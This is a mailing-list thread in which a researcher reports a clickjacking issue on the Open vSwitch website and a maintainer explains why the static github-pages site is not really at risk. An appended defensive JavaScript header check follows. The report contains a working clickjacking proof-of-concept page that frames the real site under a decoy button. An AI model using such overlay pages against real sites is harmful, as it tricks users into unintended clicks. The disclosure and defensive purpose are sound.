On 2/24/21 4:25 PM, Security Researcher wrote:
>   Hi Team ,
> I hope you are doing well.
> 
> Any updates on my report?

Hi.  Thanks for your report, but there should be no real issue.
2 main aspects:

  1. The website is just a set of static pages with sources available
     in a public repository.  So there is nothing to actually clickjack
     here.  And even if we forbid frames from different sites from
     showing ours, this will not protect against an attacker simply
     hosting a copy of our website.

  2. The website is hosted on GitHub servers via github-pages and we have
     no control over the HTTP headers GitHub server uses.  I did ask
     GitHub support and they are not going to add any X-Frame-Options,
     basically because of aspect #1.

So, all the websites hosted by github-pages don't have any restrictive
X-Frame-Options, but that is OK since all of them are open and purely static.

Best regards, Ilya Maximets.

> 
> Kind regards ,
> Vaishnavi Pardeshi
> Security Researcher
> 
> On Thu, Nov 26, 2020 at 2:06 PM Security Researcher
> <vaishnaviresearc...@gmail.com> wrote:
> 
>     Dear Team ,
> 
>     I am Vaishnavi Pardeshi, working as a security researcher, and I found a
> bug on your site. The bug report is as follows:
> 
>     a) Vulnerability name : clickjacking (CRITICAL)
> 
>     b) Vulnerability Description :
> 
>     Clickjacking (User Interface redress attack, UI redress attack, UI 
> redressing) is a malicious technique of tricking a Web user into clicking on 
> something different from what the user perceives they are clicking on, thus 
> potentially revealing confidential information or taking control of their 
> computer while clicking on seemingly innocuous web pages.
>     The server didn't return an X-Frame-Options header which means that this 
> website could be at risk of a clickjacking attack. The X-Frame-Options HTTP 
> response header can be used to indicate whether or not a browser should be 
> allowed to render a page in a <frame> or <iframe>. Sites can use this to 
> avoid clickjacking attacks, by ensuring that their content is not embedded 
> into other sites.
>     This vulnerability affects Web Server.
> 
>     c) Steps to reproduce :
> 
>     1. Copy URL of website and paste it in clickjacking code
> 
>     2. This is sample code
> 
>     Create a new HTML file
> 
>     put <iframe src="http://www.openvswitch.org/" id="frame1" width="100%"
>     height="100%">
> 
>     3. Open the HTML file with another browser, click on "click here" and see that it
> is redirected to bing.com.
> 
> 
> 
>     d) POC :
> 
>     I have attached Screenshot as well as code of clickjacking :
> 
>     <html>
>       <head>
>         <title>Clickjack test page</title>
>         <style>
>           #myBtn {
>             z-index: 999;
>             position: absolute;
>             top: 100px;
>             right: 50px;
>             color: white;
>             background-color: red;
>           }
>         </style>
>       </head>
>       <body>
>         <!-- <h1> A Sample Test Page </h1>
>              <p>Website is vulnerable to clickjacking! </p>
>              <p>Avoid random clicks </p> -->
>         <div style="z-index:-9999; position:absolute; top:0; left:0; width:70%; height:70%">
>           <iframe src="http://www.openvswitch.org/" id="frame1" width="100%" height="100%">
>           </iframe>
>         </div>
>         <div align="right" style="position:absolute; top:1; left:0; z-index:1; width:70%; height:60%; text-align:left;">
>           <a href="https://www.bing.com/?toWww=1&redig=D1C96AD6DC434FA59D3D2AC05339EA9B" target="_blank"><button id="myBtn"> click here</button></a>
>           <div id="myModal" class="modal">
>             <!-- Modal content -->
>           </div>
>         </div>
>       </body>
>     </html>
> 
>     e) Solution :
> 
> 
>     There are two main ways to prevent clickjacking:
> 
>     - Sending the proper X-Frame-Options HTTP response headers that instruct
>       the browser to not allow framing from other domains
>     - Employing defensive code in the UI to ensure that the current frame is
>       the most top level window
> 
>     Most modern Web browsers support the X-Frame-Options HTTP header. Ensure 
> it's set on all web pages returned by your site (if you expect the page to be 
> framed only by pages on your server (e.g. it's part of a FRAMESET) then 
> you'll want to use SAMEORIGIN, otherwise if you never expect the page to be 
> framed, you should use DENY. ALLOW-FROM allows specific websites to frame the 
> web page in supported web browsers).
> 
>     f) Impact:
> 
>     By using the Clickjacking technique, an attacker hijacks clicks meant for one
> page and routes them to another page, most likely for another application,
> domain, or both.
> 
>     With Kind regards ,
> 
>     Vaishnavi Pardeshi
> 
> 
> _______________________________________________
> security mailing list
> secur...@openvswitch.org
> https://mail.openvswitch.org/mailman/listinfo/ovs-security
> 

_______________________________________________
discuss mailing list
disc...@openvswitch.org
https://mail.openvswitch.org/mailman/listinfo/ovs-discuss
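Added example, not code from this thread or from the Open vSwitch project: a small defender-side check that takes a page's response headers and decides whether a document from another origin would be allowed to frame it, modelling the X-Frame-Options values named in the report (DENY, SAMEORIGIN, ALLOW-FROM) and the CSP frame-ancestors directive that browsers prefer over X-Frame-Options. The header lines and origins used are constructed sample input; host wildcards in frame-ancestors are deliberately not modelled.

```javascript
// Decide whether a page served with `rawHeaders` (array of "Name: value"
// strings, constructed sample input) may be embedded by a document at
// `framerUrl`. Returns true when framing is permitted, which is also the
// answer when neither protective header is present (the github-pages case).

function parseHeaders(rawHeaders) {
  const map = {};
  for (const line of rawHeaders) {
    const idx = line.indexOf(":");
    if (idx < 0) continue;
    const name = line.slice(0, idx).trim().toLowerCase();
    (map[name] = map[name] || []).push(line.slice(idx + 1).trim());
  }
  return map;
}

function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

// Extract the source list of the frame-ancestors directive, or null if absent.
function frameAncestorsDirective(cspValues) {
  for (const csp of cspValues) {
    for (const directive of csp.split(";")) {
      const tokens = directive.trim().split(/\s+/);
      if (tokens[0].toLowerCase() === "frame-ancestors") return tokens.slice(1);
    }
  }
  return null;
}

function framingAllowed(rawHeaders, pageUrl, framerUrl) {
  const h = parseHeaders(rawHeaders);
  const page = originOf(pageUrl), framer = originOf(framerUrl);
  const sources = frameAncestorsDirective(h["content-security-policy"] || []);
  if (sources) {
    // A frame-ancestors directive is present: browsers ignore X-Frame-Options.
    for (const src of sources) {
      const s = src.toLowerCase();
      if (s === "'none'") return false;
      if (s === "*" || (s === "'self'" && framer === page)) return true;
      if (s === framer || s === framer.split("//")[0]) return true; // exact origin or scheme-only source
    }
    return false;
  }
  const xfo = (h["x-frame-options"] || [""])[0].toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return framer === page;
  if (xfo.startsWith("ALLOW-FROM ")) return originOf(xfo.slice(11)) === framer; // legacy value
  return true; // no protective header at all: any site may frame the page
}
```

Running the check against a header set with no X-Frame-Options reproduces the situation the reply describes: framing is allowed, which is harmless for purely static content but worth flagging on any page that renders authenticated UI.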